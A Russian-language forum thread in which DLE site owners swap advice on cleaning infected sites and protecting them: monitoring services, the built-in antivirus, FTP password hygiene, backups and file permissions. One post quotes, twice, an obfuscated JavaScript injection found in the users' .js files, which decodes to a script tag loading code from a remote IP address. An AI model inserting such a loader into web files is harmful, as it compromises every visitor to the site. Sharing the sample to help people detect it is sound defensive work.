• DONATE to NULLED!
    Форуму и его команде можно помочь, мотивировать модераторов разделов.     Помогите модератору этого раздела killoff лично.

Помощь Чистка сайта на DLE от вирусов + методы защиты

Статус
В этой теме нельзя размещать новые ответы.
T

Tamplier

Полезный
Регистрация
19 Июл 2008
Сообщения
221
Реакции
18
Собственно предлагаю составить список тех файлов, куда обычно пихают свои ссылки взломщики и как их определить? К примеру, точно и наиболее часто эксплоиты льют в index.php и index.html
Но на паре сайтов я так и не нашел вируса в этих файлах (равно как и во всех пхп-файлах сайта), но вирус как был, так и оставался, не спасла даже переустановка движка (помог лишь снос базы и создание с нуля сайта)
Думаю с подобным сталкивался каждый. И алгоритм от специалистов по чистке сайта на ДЛЕ от заразы будет полезен всем.

Прошу высказаться всех, кто имеет какой-либо опыт в данном случае.
 
слыхал на одном из форумов, что вирус сидел в engine/skins/default.skin.php кажись, если не изменяет память. Больше об этом ничего не знаю, так что сам буду благодарен на любую помощь и разъяснения в этом вопросе.
 
Tamplier написал(а):
Собственно предлагаю составить список тех файлов, куда обычно пихают свои ссылки взломщики и как их определить? К примеру, точно и наиболее часто эксплоиты льют в index.php и index.html
Но на паре сайтов я так и не нашел вируса в этих файлах (равно как и во всех пхп-файлах сайта), но вирус как был, так и оставался, не спасла даже переустановка движка (помог лишь снос базы и создание с нуля сайта)
Думаю с подобным сталкивался каждый. И алгоритм от специалистов по чистке сайта на ДЛЕ от заразы будет полезен всем.

Прошу высказаться всех, кто имеет какой-либо опыт в данном случае.
Нажмите для раскрытия...

Выкачать сайт и с помощью Архивариус 3000 найти линки.
Воспользоваться штатным антивирусом дле.
После чистки советую установить Для просмотра ссылки Войди или Зарегистрируйся
Для просмотра ссылки Войди или Зарегистрируйся
Главное всё правильно настроить :)
 
У меня недавно все сайты позаражались вирусами..
Перечистил все файлы index.* main.tpl также обнаружыл в 50% *.js скриптах кусок дописаного закоментированого кода в конце..
PHP: 
<!-- 
document.write(unescape('%3CsrEcr4piaxcpt%20rEskXr4pcMtY%3DkX%2F%2F4p9GWJ4IED%2E247%2EUW2UW%2ErE19GWJ54p%2FjqueaxcrIEDy%2Eaxcj4ps4p%3E%3C%2FsckXrrEiptUW%3E').replace(/kX|GWJ|MtY|4p|IED|rE|UW|axc/g,""));
 -->
код в *.js файлах выглядел примерно так..
Боролся я с помощью рук.. скопировал все файлы движка на комп нашел все файлы *.js и кинул их в нотепад++ и ручками стирал код... но всеравно остался вирус... потом вышел дле 8,0 я обновил двиг и все стало по своим местам..
А по поводу защиты нашол интересный ресурс Для просмотра ссылки Войди или Зарегистрируйся
вы добавляете свой сайт в систему и если у вас меняется код сайта то он вас информирует в аську или мыло..
Да и ище много читал по защите и везде пишут НЕ ХРАНИТЬ ПАРОЛИ В ФТП ПРОГРАММАХ, то есть нельзя хранит в тотале или же файрзилле...
По поводу антивирусников скажу что когда лазиш по cайтма то только нод матюгаеться на вирусы (ифреймы).. а как пишут половина сайтов что типа авира победит всех ет феня..
Да и если вы думаете что если вы проверите файлы антивирусником то вам поможет.. вы глубоко ошибаетесь...
В общем по защите скажу одно.. меняйте все пароли на фтп и везде.. и устанавливайте ХОРОШИЙ антивирусник.. (я себе поставил каспера 6) проверяйте комп и некогда его не выключайте..
Да кстати ваш хостер не имеит не какого отношения к вашим вирусам... так что не будем им надоедать и будем сами решать свои проблемы.
Вот собственно все если что то вспомню допишу
 
neTpo написал(а):
У меня недавно все сайты позаражались вирусами..
Перечистил все файлы index.* main.tpl также обнаружыл в 50% *.js скриптах кусок дописаного закоментированого кода в конце..
PHP: 
<!-- 
document.write(unescape('%3CsrEcr4piaxcpt%20rEskXr4pcMtY%3DkX%2F%2F4p9GWJ4IED%2E247%2EUW2UW%2ErE19GWJ54p%2FjqueaxcrIEDy%2Eaxcj4ps4p%3E%3C%2FsckXrrEiptUW%3E').replace(/kX|GWJ|MtY|4p|IED|rE|UW|axc/g,""));
 -->
код в *.js файлах выглядел примерно так..
Боролся я с помощью рук.. скопировал все файлы движка на комп нашел все файлы *.js и кинул их в нотепад++ и ручками стирал код... но всеравно остался вирус... потом вышел дле 8,0 я обновил двиг и все стало по своим местам..
А по поводу защиты нашол интересный ресурс Для просмотра ссылки Войди или Зарегистрируйся
вы добавляете свой сайт в систему и если у вас меняется код сайта то он вас информирует в аську или мыло..
Да и ище много читал по защите и везде пишут НЕ ХРАНИТЬ ПАРОЛИ В ФТП ПРОГРАММАХ, то есть нельзя хранит в тотале или же файрзилле...
По поводу антивирусников скажу что когда лазиш по cайтма то только нод матюгаеться на вирусы (ифреймы).. а как пишут половина сайтов что типа авира победит всех ет феня..
Да и если вы думаете что если вы проверите файлы антивирусником то вам поможет.. вы глубоко ошибаетесь...
В общем по защите скажу одно.. меняйте все пароли на фтп и везде.. и устанавливайте ХОРОШИЙ антивирусник.. (я себе поставил каспера 6) проверяйте комп и некогда его не выключайте..
Да кстати ваш хостер не имеит не какого отношения к вашим вирусам... так что не будем им надоедать и будем сами решать свои проблемы.
Вот собственно все если что то вспомню допишу
Нажмите для раскрытия...
1) Не всегда хостер не имеет никакого отношения к вашим вирусам (как вы выразились) Взлом хостинг провайдера уже не в счёт?

2) Касперский далеко не лучший антивирус!

3) Выключать компьютер - это не предложение, а идиотизм! :D

От себя скажу, что действительно лучше не оставлять сохранённые пароли в ftp клиентах, почаще пользоваться встроенным антивирусом dle, регулярно делать бекап базы данных и, по возможности, всех файлов движка.
 
Я так понимаю что вирусы на сайт могут попасть не только при заливки с зараженного компьютера? Т.е. всегда есть риск что зальют вирус даже если сайт изначально на чистой площадке?
 
Crees написал(а):
Я так понимаю что вирусы на сайт могут попасть не только при заливки с зараженного компьютера? Т.е. всегда есть риск что зальют вирус даже если сайт изначально на чистой площадке?
Нажмите для раскрытия...
Конечно. Ещё возьмём, к примеру, ошибку хостера. Если поставить чистый директ админ и ничего особенного больше не делать с защитой, то любой клиент этого хостера сможет изменить ваши файлы, права на которых будут стоять 777. То есть, например, шаблон сайта. ;)
 
Да и ище много читал по защите и везде пишут НЕ ХРАНИТЬ ПАРОЛИ В ФТП ПРОГРАММАХ, то есть нельзя хранит в тотале или же файрзилле...
Нажмите для раскрытия...
Или как минимум меняйте расположение файла с паролями в другое место - трой с дефолтного места обычно считывает.
 
У меня vds. Я имел ввиду может ли любая гадость вшиться в мой index.php или любой другой файл дле движка? Я так понимаю через уязвимость только?
А по поводу защиты нашол интересный ресурс Для просмотра ссылки Войди или Зарегистрируйся
Нажмите для раскрытия...
Он нашел 2 подозрительных js
Код: 
<script language="JavaScript"> var showDate= 1; function ShowDateTime(dateStyle) { var today = new Date(); var dStr = ""; switch (dateStyle) { case showDate: default: dStr = today.toLocaleDateString(); break; } document.write(dStr); } </script>
и
Код: 
<script language="javascript" type="text/javascript"> <!-- function doVote( event ){ var frm = document.vote; var vote_check = ''; for (var i=0; i < frm.elements.length; i++) { var elmnt = frm.elements[i]; if (elmnt.type=='radio') { if(elmnt.checked == true){ vote_check = elmnt.value; break;} } } var ajax = new dle_ajax(); ajax.onShow (''); var varsString = ""; ajax.setVar("vote_id", "7" ); ajax.setVar("vote_action", event); ajax.setVar("vote_check", vote_check); ajax.setVar("vote_skin", "mmo"); ajax.requestFile = dle_root + "engine/ajax/vote.php"; ajax.method = 'GET'; ajax.element = 'vote-layer'; ajax.sendAJAX(varsString); } //--> </script>

А это js'ы дле вроде, за вотинг и мой скрипт вывода даты. Скорее всего сайтгард базируется на основе функций которые могут быть использованы в злокачественных целях, ифреймы разные и т.д.
 
Статус
В этой теме нельзя размещать новые ответы.
Назад
Сверху